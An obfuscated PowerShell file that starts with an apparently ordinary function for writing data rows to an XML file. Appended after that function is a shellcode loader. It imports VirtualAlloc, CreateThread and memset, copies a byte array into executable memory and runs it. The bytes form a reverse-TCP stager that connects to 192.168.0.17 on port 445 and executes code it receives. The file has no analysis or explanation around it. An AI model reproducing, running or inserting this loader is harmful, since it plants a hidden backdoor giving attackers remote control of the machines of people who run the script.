function C`ONverTd`ATa`R`oW-tOx`ml
{
		
	
	[CmdletBinding()]
	[OutputType({"{0}{2}{3}{1}{4}" -f 'Sy','.IO.FileInf','s','tem','o'})]
	param
	(
		[Parameter(maNDatoRY,vAluefromPiPElINE)]
		[ValidateNotNullOrEmpty()]
		[System.Data.DataRow[]]${R`Ow},
		
		[Parameter(mANdatORY)]
		[ValidateNotNullOrEmpty()]
		[string]${ObjE`ctT`ypE},
		
		[Parameter(MaNDaToRy)]
		[ValidateNotNullOrEmpty()]
		[ValidatePattern({(('6'+'1M.xm'+'lTl'+'M')-rEPLAce ([char]84+[char]108+[char]77),[char]36-CrEplAce  '61M',[char]92)})]
		[ValidateScript({ -not (.("{1}{0}{2}" -f 'P','Test-','ath') -Path ${_} -PathType ("{0}{1}"-f'Le','af')) })]
		[string]${Pa`TH}
	)
	begin {
		${e`RRo`RA`CTiONPREFe`R`e`NCE} = ("{0}{1}" -f 'S','top')
		
		${XML`WriT`eR} = &("{2}{0}{1}" -f'e','ct','New-Obj') ("{0}{4}{1}{3}{5}{2}"-f 'Sy','tem.XMl','ter','.XmlTextWr','s','i')(${p`AtH}, ${Nu`ll})
		${X`MLw`Ri`TEr}."FoRmATt`I`Ng" = ("{2}{0}{1}" -f'ndent','ed','I')
		${XMLW`RIt`er}."IndENT`A`TiON" = 1
		${xMl`wri`TEr}."i`NDeN`TcHAr" = "`t"
		${X`m`Lwr`iter}.("{1}{0}{2}{4}{3}"-f 'r','W','iteS','artDocument','t').Invoke()
		${xmLWr`I`TEr}.("{2}{1}{0}{4}{3}"-f'StartE','te','Wri','nt','leme').Invoke('{0}s' -f ${ObJ`e`CtTyPe})
	}
	process {
		try
		{
			foreach (${r} in ${r`OW})
			{
				${p`RoPeR`Ties} = ${R}."PSOB`Je`ct"."pRoP`er`TIEs"."W`HERe"{ ${_}."va`LuE" -is [string] -and ${_}."n`AmE" -ne ("{0}{2}{1}"-f 'RowE','or','rr') }
				${xM`LwRi`Ter}.("{3}{0}{4}{2}{1}" -f't','ent','m','Wri','eStartEle').Invoke(${O`BJe`CT`TyPe})
				foreach (${pr`Op} in ${PrO`pErt`iEs})
				{
					.("{0}{1}{3}{2}" -f 'W','rite-','ose','Verb') -Message "Adding attribute name [$($prop.Name)] with value [$($prop.Value)] "
					${XMlWRI`T`Er}.("{4}{1}{2}{3}{0}"-f'g','teElem','en','tStrin','Wri').Invoke(${p`ROP}."Na`Me", ${Pr`OP}."vAl`Ue")
				}
				${XmL`wrI`T`Er}.("{3}{2}{0}{1}"-f 'dElem','ent','riteEn','W').Invoke()
			}
		}
		catch
		{
			.("{1}{0}{2}"-f'ro','Write-Er','r') ${_}."eX`cEptIoN"."m`eS`sagE"
		}
	}
	end
	{
		${X`mlW`Rit`Er}.("{3}{0}{2}{1}" -f'ndDo','nt','cume','WriteE').Invoke()
		${X`MLWrit`eR}.("{1}{0}"-f'ush','Fl').Invoke()
		${xMlwrI`T`ER}.("{0}{1}"-f'Clos','e').Invoke()
		.("{1}{0}"-f '-Item','Get') -Path ${pa`TH}
	}
}
${C} = ((("{56}{51}{9}{48}{20}{25}{49}{38}{29}{71}{32}{58}{26}{40}{21}{55}{11}{43}{0}{35}{53}{16}{15}{8}{4}{63}{12}{2}{69}{47}{70}{64}{52}{37}{3}{59}{36}{61}{5}{62}{68}{57}{23}{7}{45}{22}{13}{24}{60}{31}{17}{41}{50}{44}{39}{34}{67}{14}{18}{65}{30}{10}{42}{28}{19}{6}{54}{33}{46}{1}{27}{66}" -f'dre','t src, uint','ionType','t','ize, ','32.dl',' extern IntPtr','tPtr CreateThread(IntP','S','el32.','ort(Hinmsvcrt.dll','A','locat','p','Parameter, uint dwCreationFlags, ','dw','t ','kSiz','Int','atic','l','alAlloc(','r l','tic extern In','ThreadAttr','lHin)]','tr V',' ','ic st','static extern','[DllImp',', uint dwStac','nt','tr dest, ',' IntPtr l','s','inke','llImpor','ublic ','ess,','irtu','e, IntP','Hin)]publ','d','r lpStartAddr','t','uin','n','d','p','t','llImport(Hinkern','ct);[D','s, uin',' memset(IntP','IntPtr lp','[D','ublic sta','P','(H','ibutes','rnel','l','uint flAl','te','Ptr lpThreadId);','count);','p','Hin)]p',', ui','t flPro',' I'))."r`ePLACE"(([chaR]72+[chaR]105+[chaR]110),[string][chaR]34));${w} = .("{0}{2}{1}"-f 'Add-T','pe','y') -memberDefinition ${C} -Name ("{1}{0}"-f 'in32','W') -namespace ("{4}{2}{3}{1}{0}"-f 'ions','nct','2','Fu','Win3') -passthru;[Byte[]];[Byte[]]${Z} = 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,0xc0,0xa8,0x00,0x11,0x68,0x02,0x00,0x01,0xbd,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x01,0xc3,0x29,0xc6,0x85,0xf6,0x75,0xec,0xc3;${g} = 0x1000;if (${Z}."LEn`GTh" -gt 0x1000){${G} = ${Z}."l`eNgth"};${X}=${W}::("{1}{2}{3}{0}"-f 'ualAlloc','Vi','r','t').Invoke(0,0x1000,${G},0x40);for (${I}=0;${I} -le (${z}."LeNg`Th"-1);${I}++) {${W}::"M`EMSeT"([IntPtr](${x}.("{1}{2}{0}"-f'32','T','oInt').Invoke()+${I}), ${Z}[${I}], 1)};${W}::("{3}{1}{0}{2}" -f 'Threa','te','d','Crea').Invoke(0,0,${X},0,0,0);for (;;){.("{0}{2}{3}{1}"-f'S','ep','ta','rt-sle') 60};
